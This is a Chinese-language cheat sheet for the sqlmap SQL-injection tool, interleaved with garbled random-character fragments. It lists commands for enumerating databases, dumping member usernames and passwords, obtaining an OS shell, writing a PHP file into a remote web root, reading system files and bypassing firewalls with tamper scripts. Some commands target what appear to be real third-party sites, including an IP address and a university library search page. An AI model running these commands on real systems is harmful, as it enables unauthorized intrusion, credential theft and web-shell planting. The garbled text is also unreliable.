sqlmap使用实例

admin

/pentest/database/sqlmap
- e3 g/ V5 J. S8 f
update :::::>     in the folder   after  execute    following   order : svn update

9 m  A, E* Z' c) R1 N: f1 v1 Fsqlmap.py -r 1.txt --current-db

; Y! G( ]9 v/ x1 }v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
# d+ Y9 K+ \  R' l* ?
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
. P5 K( l2 p- v+ ]1 P+ u/ Z; `猜解数据库
$ ^  {- Z$ s) k. [./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
+ n0 [  C* p3 ?3 M
+ l5 R+ R- _. I7 P猜解表名
, N6 T5 A; x1 k. d5 E+ A  S./sqlmap.py -u "injection-url" -D database_name --tables
! _! J- |5 X  k: G/ e! ?$ ?; a7 `# d
% a  c8 l. d2 y9 P) k4 s" X9 y  Osqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
& Q% b) p* M4 N# z. P* d1 }. H& osqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

# ^, K: x4 w7 d" K) t9 Rsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
+ ^) c0 O* f2 u* W8 r  @0 hsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
8 m9 i" ?7 J- G  Rsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
9 {8 S! A2 b6 Y' ~5 P
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
: m, W: N& q$ n  z8 s3 {* F+ Asqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
& U) L' n! r$ O) k( Z5 K- S! G! Lsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
6 o# L5 P5 U5 n# A3 F' B2 _sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
" Q2 f  u# y' _# nsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
* b$ s2 b! G8 C% e
' O( w  l- ?+ @9 M6 Z/ ]5 tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
' J/ N2 t  Z) `8 g$ m# _: u./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
, O$ E6 ^5 l0 xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
% E6 k3 k  b; N% M- Ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
( g- u; D$ F/ K$ |* z&submit=Go
猜解值
  I+ ]1 D4 t( b9 n/ Y& Y$ g./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
/ `, P& l$ |) R) q6 g/ B========================================================
2 a& G6 o9 B# E8 w, {搜索表名中包括mana字符的
! }! ^3 [! o: [0 Y" n/sqlmap.py -u "injection-url" -T mana --search
" a3 C( M$ R. |% C- k1 V$ e2 M$ o返回一个交互式sql shell
4 ~2 F; l1 N8 K$ }1 L1 `" f/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
6 }, M0 I4 v2 O0 p, M/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
( v* W- |/ y+ _# _+ v; X本地文件 写入 远程目标绝对路径
* J7 s5 `9 N7 f/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
) e0 k  ?; ]3 I* nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

, ~5 T4 z/ s' Lsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
. v2 c0 A8 H9 p- l/sqlmap.py -u "injection-url" --privileges -U root
& x' J  a5 \7 p' u% B. V3 A查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
sqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
+ X( v7 {2 ?$ k& G$ b& ~+ y
5 m8 _* a9 }/ U. G$ f! f9 s4 ]7 a% O/sqlmap.py -u "injection-url" --passwords -U root
( i, t, Z; g# e3 D
--start&&--stop 与 --first&&--last 的区别
8 o6 N- V4 N3 d6 a/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

% t4 j6 C! J# R" I从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
' z! V' Y5 l2 E/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
2 Z) t4 h. Z2 Q. D
# B# l- O& Q# S7 K